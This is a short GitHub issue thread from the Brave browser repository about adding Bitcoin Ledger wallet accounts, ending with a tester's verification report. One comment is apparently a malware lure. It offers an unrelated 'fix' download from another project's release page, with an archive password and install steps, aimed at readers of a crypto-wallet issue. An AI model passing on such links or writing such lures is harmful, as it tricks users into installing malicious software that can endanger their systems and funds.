### ISSUE TITLE
Btc Ledger accounts

### ISSUE THREAD

**Issue by supermassive** [brave/brave-browser#40730]
### Description

Should be able to create BTC Ledger accounts

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by srirambv** [comment]
Verification passed on 

Brave | 1.71.112 Chromium: 130.0.6723.44 (Official Build) (64-bit)
-- | --
Revision | 7d51df656b247f9432ee714a6d160142a1e11c13
OS | Windows 11 Version 23H2 (Build 22631.4317)

- Verified BTC Ledger account can be imported in wallet
- Verified BTC Ledger account can be imported during onboarding on a clean wallet
- Verified BTC Ledger account shows correct balance
